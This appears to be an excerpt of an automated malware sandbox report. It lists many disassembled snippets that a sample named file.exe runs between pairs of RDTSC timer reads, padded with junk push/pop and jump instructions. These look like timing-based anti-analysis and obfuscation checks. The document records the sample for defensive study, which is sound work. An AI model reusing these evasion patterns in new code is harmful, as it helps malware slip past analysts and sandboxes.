                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B57 second address: 745B65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA430E679E6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B65 second address: 745B76 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B76 second address: 745B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B7A second address: 745B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B7E second address: 745B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B95 second address: 745B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745B9A second address: 745BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FA430E679E6h 0x00000009 ja 00007FA430E679E6h 0x0000000f jmp 00007FA430E679ECh 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749C43 second address: 749C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749C47 second address: 749C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA430E679E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FA430E679F8h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749C72 second address: 749C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749C78 second address: 749C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679F5h 0x00000009 jg 00007FA430E679E6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7490CB second address: 7490D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7490D5 second address: 7490DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7490DB second address: 7490DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7490DF second address: 7490E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749549 second address: 74957C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E329h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FA43130E321h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7496E0 second address: 7496E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74CA9D second address: 74CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E325h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C31B second address: 74C326 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C74D second address: 74C754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C754 second address: 74C76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA430E679ECh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C76C second address: 74C770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754817 second address: 754821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752D75 second address: 752DA9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA43130E31Bh 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA43130E322h 0x00000017 popad 0x00000018 pushad 0x00000019 jnl 00007FA43130E316h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753699 second address: 7536A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA430E679E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7536A3 second address: 7536A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753951 second address: 753956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75420E second address: 754215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75451E second address: 754564 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA430E67A05h 0x00000008 pushad 0x00000009 jmp 00007FA430E679F6h 0x0000000e jns 00007FA430E679E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756B5F second address: 756BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FA43130E31Ah 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FA43130E323h 0x00000016 popad 0x00000017 jc 00007FA43130E328h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756BA0 second address: 756BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B51A5 second address: 6B51E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b je 00007FA43130E331h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FA43130E329h 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007FA43130E316h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EEDE second address: 75EF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F5h 0x00000009 jmp 00007FA430E679EDh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EF04 second address: 75EF37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FA43130E316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA43130E31Ch 0x00000013 jmp 00007FA43130E329h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1A2 second address: 75E1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA430E679E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1AC second address: 75E1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E1B0 second address: 75E1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edi 0x00000008 jo 00007FA430E679EAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FA430E679E6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E4B0 second address: 75E4BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA43130E316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E4BA second address: 75E4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FA430E679E6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 jmp 00007FA430E679F6h 0x00000015 push edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E4EC second address: 75E527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Dh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FA43130E31Ch 0x00000011 jno 00007FA43130E316h 0x00000017 jmp 00007FA43130E329h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E527 second address: 75E52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA93 second address: 75EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA9D second address: 75EAA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76540B second address: 76544B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA43130E31Eh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jl 00007FA43130E316h 0x00000016 pop ebx 0x00000017 pushad 0x00000018 jmp 00007FA43130E327h 0x0000001d push edx 0x0000001e pop edx 0x0000001f je 00007FA43130E316h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765883 second address: 765889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765889 second address: 7658A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FA43130E31Dh 0x0000000d jnl 00007FA43130E316h 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7658A8 second address: 7658C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FA430E679E6h 0x0000000c popad 0x0000000d pushad 0x0000000e je 00007FA430E679E6h 0x00000014 jno 00007FA430E679E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7658C4 second address: 7658CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765A56 second address: 765A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765A5D second address: 765A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA43130E316h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765BBD second address: 765BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765D1E second address: 765D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765D25 second address: 765D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA430E679EAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76602A second address: 766034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766034 second address: 76604B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007FA430E679E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662F2 second address: 7662F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662F6 second address: 7662FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662FA second address: 76630E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76630E second address: 766329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FA430E679F5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766329 second address: 766354 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 jmp 00007FA43130E329h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FA43130E316h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766ADC second address: 766AE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766AE2 second address: 766AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FA43130E316h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766AFA second address: 766AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671AE second address: 7671B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671B4 second address: 7671E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA430E679F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA430E679F5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671E3 second address: 7671E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769823 second address: 769827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769827 second address: 769848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 jmp 00007FA43130E31Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769848 second address: 769850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769850 second address: 769855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769855 second address: 76986A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FA430E679E6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76986A second address: 76986E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76986E second address: 76988A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EB05 second address: 76EB2F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA43130E330h 0x00000008 jmp 00007FA43130E328h 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007FA43130E31Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EB2F second address: 76EB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jmp 00007FA430E679F1h 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EB4A second address: 76EB73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E321h 0x00000007 pushad 0x00000008 jmp 00007FA43130E323h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EC98 second address: 76EC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EC9C second address: 76ECA9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECA9 second address: 76ECAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECAE second address: 76ECB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECB3 second address: 76ECD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FA430E679F4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECD3 second address: 76ED03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA43130E31Bh 0x0000000d pushad 0x0000000e jmp 00007FA43130E324h 0x00000013 js 00007FA43130E316h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ED03 second address: 76ED0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADBC second address: 77ADC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADC0 second address: 77ADCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADCF second address: 77ADE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA43130E31Ch 0x0000000a jng 00007FA43130E326h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADE8 second address: 77AE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679EAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FA430E679E8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AE01 second address: 77AE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AE07 second address: 77AE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AF48 second address: 77AF67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnc 00007FA43130E316h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA43130E31Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AF67 second address: 77AF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FA430E679EAh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FA430E679E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E294 second address: 77E29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784670 second address: 784676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784676 second address: 78467A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78467A second address: 7846A8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA430E679EEh 0x00000008 jbe 00007FA430E679E6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA430E679F6h 0x0000001c pop esi 0x0000001d rdtsc
